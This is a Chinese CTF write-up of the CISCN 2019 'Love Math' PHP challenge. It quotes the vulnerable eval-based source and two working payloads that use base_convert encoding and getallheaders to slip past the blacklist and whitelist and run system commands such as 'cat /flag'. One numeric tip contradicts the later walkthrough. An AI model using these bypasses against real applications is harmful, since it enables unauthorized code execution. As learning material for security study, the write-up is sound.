[PHP知识库]2021-7-23 [CISCN 2019 初赛]Love Math 知识点：PHP函数的灵活运用 base_convert getallheaders

前言

今天做到了一个有趣的题目，是对PHP函数的灵活运用，灵活转码，达到绕过设置的黑白名单的目的，实现命令的执行，总之题目很灵活o(╥﹏╥)o给虐哭了，看了大佬们的博客才懂得灵活运用一些神奇的函数，还有最多有三十六进制，所以有些进制会带有字母，所以造成了漏洞啊！！！

一、前置知识

先附上一些wp：
大佬博客讲解1
大佬博客讲解2
大佬博客讲解3

好用的网址:
任意进制的转换

一些函数：
base_convert(number,frombase,tobase);：在任意进制之间转换数字。
dechex() 函数：把十进制转换为十六进制。
hex2bin() 函数：把十六进制值的字符串转换为 ASCII 字符。

getallheaders函数讲解：

如上图所示，getallheaders可以返回header这个数组全部信息，就是返回所有http请求头信息，如果只需要某一个头部的信息，使用键值取出即可：例getallheaders（）[host]

eval() 函数：把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码，且必须以分号结尾。如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。

一些小知识点：
37907361743（十进制）：hex2bin（36进制）
_GET（36进制）:5f474554（十六进制） 1598506324（十进制）
1751504350（十进制）：system（36进制）
8768397090111664438（十进制）：cat /flag（三十进制）

{}花括号可以代替[]方括号

二、解题过程

从BUU打开题目环境，一进去就发现了源码：

<?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
} 

经过对上面源码的分析，我们可以知道通过get传参传入c并赋值给content这个变量，然后对content进行了黑名单过滤和白名单过滤，最后用eval函数对content解析执行并输出了。（注意还有一个限制条件，构造的payload不能太长，小于80啊！！！）

看得到黑名单过滤了一些特殊字符，白名单有限制字母只能是那些数学函数名，可真难办啊，去看了大佬的blog，学习了两种方法，不过都是基于base_convert这个进制转换函数：

①构造$_GET进行传参造成命令执行：

payload：

?tan=system&abs=cat /flag&c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{tan}($$pi{abs})
解析：记得利用同名的数学函数做变量
利用c传参传递变量$pi
base_convert(37907361743,10,36)(dechex(1598506324))：
首先是base_convert(37907361743,10,36)十进制转换为三十六进制变成了hex2bin，
然后dechex(1598506324)被hex2bin转化过后就是_GET
即$pi=_GET,所以$$pi=$_GET，由于{}花括号可以代替[]方括号，
所以可以使用$_GET{}，在分别传参tan=system和abs=cat /flag就可以造成命令执行了

②利用getallheaders函数，改写头部信息造成漏洞：
payload：这个使用burpsuit方便一点，记得在头部那里添加一个你要执行的
命令的信息！！！

?c=$pi=base_convert;$pi(1751504350,10,36)($pi(8768397090111664438,10,30)(){1})
解析：
传参进来，令$pi=base_convert
(1751504350,10,36):十进制转换为三十六进制就是system
(8768397090111664438,10,30)（）{1}：
首先(8768397090111664438,10,30)转换一下就是getallheaders（我尝试了很多遍，
发现就只有十进制转化为三十进制的时候才能成功，不知道为什么o(╥﹏╥)o麻了），
加个（）就可以执行这个函数，就会返回来一个数组，然后[1]的意思就是取出键名为1的那个元素的值。
**记得在头部添加信息！！！如下图**

总结

做完这题，感觉php的一些函数是真的奇妙，我也明白自己的php的基础不太行，没有系统学过，基本都是做题审计出来的。。。还是需要认真地去学习一下php的一些基础知识！！！